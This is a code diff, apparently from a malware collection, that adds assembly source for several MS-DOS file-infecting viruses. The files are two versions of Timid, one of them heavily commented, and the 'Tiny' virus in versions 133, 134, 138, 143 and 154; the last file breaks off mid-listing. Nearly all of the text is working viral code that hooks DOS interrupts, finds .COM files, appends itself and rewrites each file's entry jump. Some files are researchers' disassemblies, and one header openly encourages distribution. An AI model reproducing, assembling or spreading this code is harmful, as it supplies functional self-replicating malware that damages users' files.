TIMER MODE FOR PULSE OUTPUT, RATHER THAN SQUARE +; MODE AS SET BY DOS + + MOV AL,00110100B ;CTR 0, LSB THEN MSB + ;MODE 2, BINARY + OUT TIMER_MODE,AL ;MODE REGISTER FOR 8253 + SUB AX,AX ;SET 0, RESULT IN MAX COUNT + OUT TIMER0,AL + OUT TIMER0,AL + RET +_time_int ENDP + + + PUBLIC _elaptime +_elaptime PROC + +; long int far elaptime(void); +; +; DETERMINE ELAPSED TIME SINCE LAST CALL +; RETURNS 32 BIT (LONG) VALUE WHICH IS +; NEW - TIMER_HI:TIMER_LO:TIMER_COUNT MINUS +; OLD - TIMER_HI:TIMER_LO:TIMER_COUNT + +; ASSUMPTION MADE THAT 32 BITS WILL NOT OVERFLOW!!!! + + PUSH ES + MOV AX,BIOS + MOV ES,AX + ASSUME ES:BIOS + + MOV AL,0 ;PREPARE TO LATCH COUNTER + OUT TIMER_MODE,AL ;LATCH 8253 + + PUSHF ;SAVE INTERRUPT STATE + CLI ;TURN INTERRUPT OFF WHILE READING CODE + IN AL,TIMER0 + MOV DL,AL + IN AL,TIMER0 + MOV DH,AL ;DX HAS NEW CHIP COUNT(count down value) + + MOV BX,ES:TIMER_LOW ;BX HAS SYSTEM TIME LOW WORD + MOV AX,ES:TIMER_HI ;AX HAS SYSTEM TIME HIGH WORD + +; NOW HAVE A 48 BIT WORD AX:BX:DX FOR THE PRESENT TIME + MOV CX,TIMER_COUNT ;SWAP AND SUBTRACT + MOV TIMER_COUNT,DX + SUB CX,DX + +; CX: HAS LOW 16 BITS OF DIFFERENCE + + MOV DX,SYS_LOW ;SWAP AND SUBTRACT + MOV SYS_LOW,BX + SBB BX,DX + +; BX: HAS MID 16 BITS OF DIFFERENCE + + MOV DX,SYS_HI ;SWAP AND SUBTRACT + MOV SYS_HI,AX + SBB AX,DX + +; AX: HAS HIGH 16 BITS OF DIFFERENCE + +; NOW HAVE A 48 BIT WORD THAT IS DIFFERENCE +; ONLY PASS BACK 32 BITS AT PRESENT +; AS DX:AX + + MOV AX,CX ;LOW 16 BITS + MOV DX,BX ;MID 16 BITS + + + POPF + POP ES + RET +_elaptime ENDP + + + END + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.timid.asm b/MSDOS/Virus.MSDOS.Unknown.timid.asm new file mode 100644 index 00000000..5490dcc1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.timid.asm @@ -0,0 +1,195 @@ +;TIMID VIRUS asm by Mark Ludwig in 1991. +; +;-infects .coms only in current directory unless called by dos path statement +;-announces each file infected. +;297bytes=eff. length +;Copied from Mark Ludwig's "The Little Black Book of Computer Viruses" +;Slightly modified for A86 assembly. +;-asm makes a 64k file, run against 'bait' .com to get 297 byte virus +;-fixed bug in code reprinted in his book. +;all infected files will have VI at byte position 4-5. +;Mark Ludwig claims copyright on this virus and said he will +; sue anyone distributing his viruses around. I say have fun!. + + +main segment byte + assume cs:main, ds:main, ss:nothing + + org 100h + +host: + jmp near ptr virus_start + db 'VI' ;identifies virus + mov ah, 4ch + mov al, 0 + int 21h + +virus: + +comfile db '*.com',0 + +virus_start: + call get_start + +get_start: + sub word ptr [vir_start], offset get_start - offset virus + mov dx, offset dta + mov ah, 1ah + int 21h + call find_file + jnz exit_virus + call infect + mov dx, offset fname + mov [handle] b,24h + mov ah, 9 + int 21h +exit_virus: ;bug was here in book + mov dx, 80h + mov ah, 1ah + int 21h + mov bx, [vir_start] + mov ax, word ptr [bx+(offset start_code)-(offset virus)] + mov word ptr [host], ax + mov ax, word ptr [bx+(offset start_code)-(offset virus)+2] + mov word ptr [host+2],ax + mov al, byte ptr [bx+(offset start_code)-(offset virus)+4] + mov byte ptr [host+4], al + mov [vir_start], 100h + ret +start_code: + nop + nop + nop + nop + nop + +find_file: + mov dx, [vir_start] + add dx, offset comfile-offset virus + mov cx, 3fh + mov ah, 4eh + int 21h + +ff_loop: + or al,al + jnz ff_done + call file_ok + jz ff_done + mov ah, 4fh + int 21h + jmp ff_loop + +ff_done: + ret + +file_ok: + mov dx, offset fname + mov ax, 3d02h + int 21h + jc fok_nzend + mov bx, ax + push bx + mov cx, 5 + mov dx, offset start_image + mov ah, 3fh + int 21h + pop bx + mov ah, 3eh + int 21h + mov ax, word ptr [fsize] + add ax, offset endvirus - offset virus + jc fok_nzend + cmp byte ptr [start_image], 0e9h + jnz fok_zend + +fok_nzend: + mov al, 1 + or al,al + ret + +fok_zend: + xor al,al + ret + +infect: + mov dx, offset fname + mov ax, 3d02h + int 21h + mov word ptr [handle],ax + + xor cx,cx + mov dx,cx + mov bx, word ptr [handle] + mov ax, 4202h + int 21h + + mov cx, offset final -offset virus + mov dx, [vir_start] + mov bx, word ptr [handle] + mov ah, 40h + int 21h + + xor cx,cx + mov dx, word ptr [fsize] + add dx, offset start_code-offset virus + mov bx, word ptr [handle] + mov ax, 4200h + int 21h + + mov cx, 5 + mov bx, word ptr [handle] + mov dx, offset start_image + mov ah, 40h + int 21h + + xor cx,cx + mov dx,cx + mov bx, word ptr [handle] + mov ax, 4200h + int 21h + + mov bx, [vir_start] + mov byte ptr [start_image], 0e9h + mov ax, word ptr [fsize] + add ax, offset virus_start-offset virus-3 + mov word ptr [start_image+1], ax + mov word ptr [start_image+3], 4956h + + mov cx, 5 + mov dx, offset start_image + mov bx, word ptr [handle] + mov ah, 40h + int 21h + + mov bx, word ptr [handle] + mov ah, 3eh + int 21h + ret + +final: + +;data area +endvirus equ $ + 212 +org 0ff2ah + +dta db 1ah dup (?) +fsize dw 0,0 +fname db 13 dup (?) +handle dw 0 +start_image db 0,0,0,0,0 +vstack dw 50h dup (?) +vir_start dw (?) + +main ends +end host +;end of timid.asm + + + + + + + + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.timid1.asm b/MSDOS/Virus.MSDOS.Unknown.timid1.asm new file mode 100644 index 00000000..894072e7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.timid1.asm @@ -0,0 +1,210 @@ +;This program is a basic virus that infects just COM files. It gets the first +;five bytes of its host and stores them elsewhere in the program and puts a +;jump to it at the start, along with the letters "VI", which are used to +;by the virus to identify an already infected program. + + +MAIN SEGMENT BYTE + ASSUME CS:MAIN,DS:MAIN,SS:NOTHING + + ORG 100H + +;This is a shell of a program which will release the virus into the system. +;All it does is jump to the virus routine, which does its job and returns to +;it, at which point it terminates to DOS. + +HOST: + jmp NEAR PTR VIRUS_START ;Note: MASM is too stupid to assemble this correctly + db 'VI' + mov ah,4CH + mov al,0 + int 21H ;terminate normally with DOS + +VIRUS: ;this is a label for the first byte of the virus + +COMFILE DB '*.COM',0 ;search string for a com file + +VIRUS_START: + call GET_START ;get start address - this is a trick to determine the location of the start of this program +GET_START: ;put the address of GET_START on the stack with the call, + sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS ;which is overlayed by VIR_START. Subtract offsets to get @VIRUS + mov dx,OFFSET DTA ;put DTA at the end of the virus for now + mov ah,1AH ;set new DTA function + int 21H + call FIND_FILE ;get a com file to attack + jnz EXIT_VIRUS ;returned nz - no file to infect, exit + call INFECT ;have a good COM file to use - infect it + mov dx,OFFSET FNAME ;display the name of the file just infected + mov WORD PTR [HANDLE],24H ;make sure the string terminates, put '$' after it + mov ah,9 + int 21H ;display it +EXIT_VIRUS: + mov dx,80H ;fix the DTA so that the host program doesn't + mov ah,1AH ;get confused and write over its data with + int 21H ;file i/o or something like that! + mov bx,[VIR_START] ;get the start address of the virus + mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)] ;restore the 5 original bytes + mov WORD PTR [HOST],ax ;of the COM file to their + mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+2] ;to the start of the file + mov WORD PTR [HOST+2],ax + mov al,BYTE PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+4] ;to the start of the file + mov BYTE PTR [HOST+4],al + mov [VIR_START],100H ;set up stack to do return to host program + ret ;and return to host + +START_CODE: ;move first 5 bytes from host program to here + nop ;nop's for the original assembly code + nop ;will work fine + nop + nop + nop + +;-------------------------------------------------------------------------- +;Find a file which passes FILE_OK +; +;This routine does a simple directory search to find a COM file in the +;current directory, to find a file for which FILE_OK returns with C reset. +; +FIND_FILE: + mov dx,[VIR_START] +; add dx,OFFSET COMFILE - OFFSET VIRUS ;this is zero here, so omit it + mov cx,3FH ;search for any file, no matter what the attributes + mov ah,4EH ;do DOS search first function + int 21H +FF_LOOP: + or al,al ;is DOS return OK? + jnz FF_DONE ;no - quit with Z reset + call FILE_OK ;return ok - is this a good file to use? + jz FF_DONE ;yes - valid file found - exit with z set + mov ah,4FH ;not a valid file, so + int 21H ;do find next function + jmp FF_LOOP ;and go test next file for validity +FF_DONE: + ret + + +;-------------------------------------------------------------------------- +;Function to determine whether the COM file specified in FNAME is useable. +;if so return z, else return nz. +;What makes a COM file useable?: +; a) There must be space for the virus without exceeding the +; 64 KByte file size limit. +; b) Bytes 0, 3 and 4 of the file are not a near jump op code, +; and 'V', 'I', respectively +; +FILE_OK: + mov dx,OFFSET FNAME ;first open the file + mov ax,3D02H ;r/w access open file, since we'll want to write to it + int 21H + jc FOK_NZEND ;error opening file - quit and say this file can't be used + + mov bx,ax ;put file handle in bx + push bx ;and save it on the stack + mov cx,5 ;next read 5 bytes at the start of the program + mov dx,OFFSET START_IMAGE ;and store them here + mov ah,3FH ;DOS read function + int 21H + + pop bx ;restore the file handle + mov ah,3EH + int 21H ;and close the file + + mov ax,WORD PTR [FSIZE] ;get the file size of the host + add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add the size of the virus to it + jc FOK_NZEND ;c set if ax overflows, which will happen if size goes above 64K + cmp BYTE PTR [START_IMAGE],0E9H ;size ok - is first byte a near jump op code? + jnz FOK_ZEND ;not a near jump, file must be ok, exit with z set + cmp WORD PTR [START_IMAGE+3],4956H ;ok, is 'VI' in positions 3 & 4? + jnz FOK_ZEND ;no, file can be infected, return with Z set +FOK_NZEND: + mov al,1 ;we'd better not infect this file + or al,al ;so return with z reset + ret +FOK_ZEND: + xor al,al ;ok to infect, return with z set + ret + +;-------------------------------------------------------------------------- +;This routine moves the virus (this program) to the end of the COM file +;Basically, it just copies everything here to there, and then goes and +;adjusts the 5 bytes at the start of the program and the five bytes stored +;in memory. +; +INFECT: + mov dx,OFFSET FNAME ;first open the file + mov ax,3D02H ;r/w access open file, since we'll want to write to it + int 21H + mov WORD PTR [HANDLE],ax ;and save the file handle here + + xor cx,cx ;prepare to write virus on new file; positon file pointer + mov dx,cx ;cx:dx pointer = 0 + mov bx,WORD PTR [HANDLE] + mov ax,4202H ;locate pointer to end DOS function + int 21H + + mov cx,OFFSET FINAL - OFFSET VIRUS ;now write the virus; cx=number of bytes to write + mov dx,[VIR_START] ;ds:dx = place in memory to write from + mov bx,WORD PTR [HANDLE] ;bx = file handle + mov ah,40H ;DOS write function + int 21H + + xor cx,cx ;now we have to go save the 5 bytes which came from the start of the + mov dx,WORD PTR [FSIZE] ;so position the file pointer + add dx,OFFSET START_CODE - OFFSET VIRUS ;to where START_CODE is in the new virus + mov bx,WORD PTR [HANDLE] + mov ax,4200H ;and use DOS to position the file pointer + int 21H + + mov cx,5 ;now go write START_CODE in the file + mov bx,WORD PTR [HANDLE] ;get file handle + mov dx,OFFSET START_IMAGE ;during the FILE_OK function above + mov ah,40H + int 21H + + xor cx,cx ;now go back to the start of host program + mov dx,cx ;so we can put the jump to the virus in + mov bx,WORD PTR [HANDLE] + mov ax,4200H ;locate file pointer function + int 21H + + mov bx,[VIR_START] ;calculate jump location for start of code + mov BYTE PTR [START_IMAGE],0E9H ;first the near jump op code E9 + mov ax,WORD PTR [FSIZE] ;and then the relative address + add ax,OFFSET VIRUS_START-OFFSET VIRUS-3 ;these go in the START_IMAGE area + mov WORD PTR [START_IMAGE+1],ax + mov WORD PTR [START_IMAGE+3],4956H ;and put 'VI' ID code in + + mov cx,5 ;ok, now go write the 5 bytes we just put in START_IMAGE + mov dx,OFFSET START_IMAGE ;ds:dx = pointer to START_IMAGE + mov bx,WORD PTR [HANDLE] ;file handle + mov ah,40H ;DOS write function + int 21H + + mov bx,WORD PTR [HANDLE] ;finally, get handle off of stack + mov ah,3EH ;and close file + int 21H + + ret ;all done, the virus is transferred + +FINAL: ;label for last byte of code to be kept in virus when it moves + +ENDVIRUS EQU $ + 212 ;label for determining space needed by virus + ;Note: 212 = FFFF - FF2A - 1 = size of data space + ; $ gives approximate size of code required for virus + + ORG 0FF2AH + +DTA DB 1AH dup (?) ;this is a work area for the search function +FSIZE DW 0,0 ;file size storage area +FNAME DB 13 dup (?) ;area for file path +HANDLE DW 0 ;file handle +START_IMAGE DB 0,0,0,0,0 ;an area to store 3 bytes for reading and writing to file +VSTACK DW 50H dup (?) ;stack for the virus program +VIR_START DW (?) ;start address of VIRUS (overlays the stack) + + +MAIN ENDS + + + END HOST + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-133.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-133.asm new file mode 100644 index 00000000..3dd28b18 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-133.asm @@ -0,0 +1,81 @@ +VSize = 085h + +Code Segment + Assume CS:Code + Org 600h + +Bytes db 0CDh,20h,90h,90h + +Start: mov si, 0100h + mov bx, offset Int21 + mov cx, 0050h + mov di, si + add si, [si+2] + push di + movsw + movsw + mov es, cx + cmpsb + je StartFile + dec si + dec di + rep movsw + mov es, cx + xchg ax, bx + xchg ax, cx +Loop0: xchg ax, cx + xchg ax, word ptr es:[di-120h] + stosw + jcxz Loop0 + xchg ax, bx +StartFile: + push ds + pop es + ret + +Int21: cmp ax, 4B00h + jne End21 +Exec: push ax bx dx ds es + mov ax, 3D02h + call DoInt21 + jc EndExec + cbw ; Zero AH + cwd ; Zero DX + mov bx, si ; Move handle to BX + mov ds, ax ; Set DS and ES to 60h, + mov es, ax ; the virus data segment + mov ah, 3Fh ; Read first 4 bytes + int 69h + mov al, 4Dh + scasb ; Check for 4D5Ah or infected file mark + je Close ; .EXE or already infected + mov al, 2 + call LSeek ; Seek to the end, SI now contains file size + mov cl, VSize ; Virus size in CX, prepare to write + int 69h ; AH is 40h, i.e. Write operation + mov ax, 0E94Dh ; Virus header in AX + stosw ; Store it + xchg ax, si ; Move file size in AX + stosw ; Complete JMP instruction + xchg ax, dx ; Zero AX + call LSeek ; Seek to the beginning + int 69h ; AH is 40h, write the virus header +Close: mov ah,3Eh ; Close the file + int 69h +EndExec: pop es ds dx bx ax +End21: jmp dword ptr cs:[69h * 4] + +LSeek: mov ah, 42h ; Seek operation + cwd ; Zero DX +DoInt21: xor cx, cx ; External entry for Open, zero cx + int 69h + mov cl, 4 ; 4 bytes will be read/written + xchg ax, si ; Store AX in SI + mov ax, 4060h ; Prepare AH for Write + xor di, di ; Zero DI + ret + +VLen = $ - offset Bytes + +Code EndS + End diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-134.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-134.asm new file mode 100644 index 00000000..af0220f6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-134.asm @@ -0,0 +1,162 @@ + page ,132 + name TINY134 + title The 'Tiny' virus, version TINY-134 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-134 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + +; The original first 4 bytes of the infected file: + +first4 db 0CDh, 20, 90, 90 + +v_entry: + mov si,0FF ; Initialize some registers + mov di,offset start ; Put the addres of program start in DI + mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler + +; The virus will be installed in memory at +; address 0050:0100h (i.e., at segment 60h): + + mov cx,50 + + add si,[si+2] ; Determine the start addres of the virus body + + push di ; Now a Near RET instruction will run the prg. + + movsw ; Restore the original first 4 bytes + movsw + + mov es,cx ; Point ES:DI at 0050:0100h + cmpsb ; Check if the virus is present in memory + jz run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec si ; Correct SI & DI to point at the start of + dec di ; virus code and to destination address + rep movsw ; Move the virus there + + mov es,cx ; ES := 0 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler. +; By the way, now DI == 1A4h (i.e., 69h*4): + + xchg ax,bx ; Thransfer INT 21h vector to INT 69h, + xchg ax,cx ; preserving AX +lp: + xchg ax,cx ; Get a word + xchg ax,es:[di-(69-21)*4] ; Swap the two words + stosw ; Save the word + jcxz lp ; Loop until done (two times) + + xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy) + +run: + push ds ; Restore ES + pop es + ret ; And exit (go to CS:100h) + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push dx + push ds + push es + + mov ax,3D02 ; Open the file for both reading and writting + call do_int21 + jc end_exec ; Exit on error + + cbw ; Zero AH + cwd ; Zero DX + mov bx,si ; Save handle in BX + mov ds,ax ; Set DS and ES to 60h, + mov es,ax ; the virus data segment + + mov ah,3F ; Read the first 4 bytes + int 69 + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + mov al,'M' ; Look for `M' + repne scasb + jz end_exec ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek ; SI now contains the file size + + mov cl,v_len ; Length of virus body + int 69 ; Append the virus to the file (AH is now 40h) + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + inc si ; Add 1 to file size for the JMP + xchg ax,si ; Move it in AX + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + xchg ax,dx ; Zero AX + call lseek ; Seek to the beginning + int 69 ; AH is 40h, write the JMP instruction + +end_exec: + pop es ; Restore used registers + pop ds + pop dx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[69*4] + +lseek: + mov ah,42 ; Seek operation + cwd ; Zero DX +do_int21: + xor cx,cx ; External entry for Open + int 69 + mov cl,4 ; 4 bytes will be read/written + xchg ax,si ; Store AX in SI + mov ax,4060 ; Prepare AH for Write + xor di,di ; Zero DI + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-138.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-138.asm new file mode 100644 index 00000000..1fe30f24 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-138.asm @@ -0,0 +1,168 @@ + page ,132 + name TINY138 + title The 'Tiny' virus, version TINY-138 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-138 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Initialize some registers + mov di,offset start ; Put the addres of program start in DI + mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler + +; The virus will be installed in memory at +; address 0050:0100h (i.e., at segment 60h): + + mov cx,50 + + add si,[si+2] ; Determine the start addres of the virus body + + push di ; Now a Near RET instruction will run the prg. + + movsw ; Restore the original first 4 bytes + movsw + + mov es,cx ; Point ES:DI at 0050:0100h + cmpsb ; Check if the virus is present in memory + jz run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec si ; Correct SI & DI to point at the start of + dec di ; virus code and to destination address + rep movsw ; Move the virus there + + mov es,cx ; ES := 0 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler. +; By the way, now DI == 1A4h (i.e., 69h*4): + + xchg ax,bx ; Thransfer INT 21h vector to INT 69h, + xchg ax,cx ; preserving AX +lp: + xchg ax,cx ; Get a word + xchg ax,es:[di-(69-21)*4] ; Swap the two words + stosw ; Save the word + jcxz lp ; Loop until done (two times) + + xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy) + +run: + push ds ; Restore ES + pop es + ret ; And exit (go to CS:100h) + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push dx + push ds + push es + + mov ax,3D02 ; Open the file for both reading and writting + call do_int21 + jc end_exec ; Exit on error + + cbw ; Zero AH + cwd ; Zero DX + mov bx,si ; Save handle in BX + mov ds,ax ; Set DS and ES to 60h, + mov es,ax ; the virus data segment + + mov ah,3F ; Read the first 4 bytes + int 69 + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + mov al,'M' ; Look for `M' + repne scasb + jz close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek ; SI now contains the file size + + mov cl,v_len ; Length of virus body + int 69 ; Append the virus to the file (AH is now 40h) + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + inc si ; Add 1 to file size for the JMP + xchg ax,si ; Move it in AX + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + xchg ax,dx ; Zero AX + call lseek ; Seek to the beginning + int 69 ; AH is 40h, write the JMP instruction + +close: + mov ah,3E ; Close the file + int 69 + +end_exec: + pop es ; Restore used registers + pop ds + pop dx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[69*4] + +lseek: + mov ah,42 ; Seek operation + cwd ; Zero DX +do_int21: + xor cx,cx ; External entry for Open + int 69 + mov cl,4 ; 4 bytes will be read/written + xchg ax,si ; Store AX in SI + mov ax,4060 ; Prepare AH for Write + xor di,di ; Zero DI + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-143.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-143.asm new file mode 100644 index 00000000..fb15155e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-143.asm @@ -0,0 +1,174 @@ + page ,132 + name TINY143 + title The 'Tiny' virus, version TINY-143 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-143 +; Disassembled by Vesselin Bontchev, August 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Initialize some registers + mov di,offset start ; Put the addres of program start in DI + mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler + +; The virus will be installed in memory at +; address 0050:0100h (i.e., at segment 60h): + + mov cx,50 + + add si,[si+2] ; Determine the start addres of the virus body + + push di ; Now a Near RET instruction will run the prg. + + movsw ; Restore the original first 4 bytes + movsw + + mov es,cx ; Point ES:DI at 0050:0100h + cmpsb ; Check if the virus is present in memory + jz run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec si ; Correct SI & DI to point at the start of + dec di ; virus code and to destination address + rep movsw ; Move the virus there + + mov es,cx ; ES := 0 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler. +; By the way, now DI == 1A4h (i.e., 69h*4): + + xchg ax,bx ; Thransfer INT 21h vector to INT 69h, + xchg ax,cx ; preserving AX +lp: + xchg ax,cx ; Get a word + xchg ax,es:[di-(69-21)*4] ; Swap the two words + stosw ; Save the word + jcxz lp ; Loop until done (two times) + + xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy) + +run: + push ds ; Restore ES + pop es + ret ; And exit (go to CS:100h) + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push dx + push ds + push es + + mov ax,3D02 ; Open the file for both reading and writting + int 69 + jc end_exec ; Exit on error + xchg ax,bx ; Save the file handle in BX + + call lseek1 ; Lseek to file beginning (and set CL to 4) + + mov al,seg_60 shr 4 ; Read the first 4 bytes of the file + mov ds,ax ; Set buffer offset to 0060:0000h + mov es,ax ; Point ES there too + mov ah,3F + int 69 ; Do read + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + xor di,di + mov al,'M' ; Look for `M' + repne scasb + jz close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file (and put 4 in CL) + call lseek + + push ax ; Save file length + + mov cl,v_len ; Length of virus body + mov ah,40 ; Append the virus to the file + int 69 ; Do it + + call lseek1 ; Seek to the file beginning + + xchg ax,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov ah,40 ; Overwrite the first 4 bytes of the file + int 69 ; Do it + +close: + mov ah,3E ; Close the file + int 69 + +end_exec: + pop es ; Restore used registers + pop ds + pop dx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[69*4] + +lseek1: + mov al,0 ; Lseek to the file beginning + +lseek: + mov ah,42 ; Lseek either to file beginning or to file end + xor cx,cx + xor dx,dx + int 69 ; Do it + + mov cl,4 ; Put 4 in CL + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-154.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-154.asm new file mode 100644 index 00000000..facdd6a5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-154.asm @@ -0,0 +1,182 @@ + page ,132 + name TINY154 + title The 'Tiny' virus, version TINY-154 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-154 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + + xchg ax,cx +vect_cpy: + xchg ax,cx + xchg ax,word ptr es:[di-(32-21)*4] + stosw + jcxz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg ax,bx ; Save the file handle in BX + + call lseek1 + + mov ah,3F ; Read the first 4 bytes of the file + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov 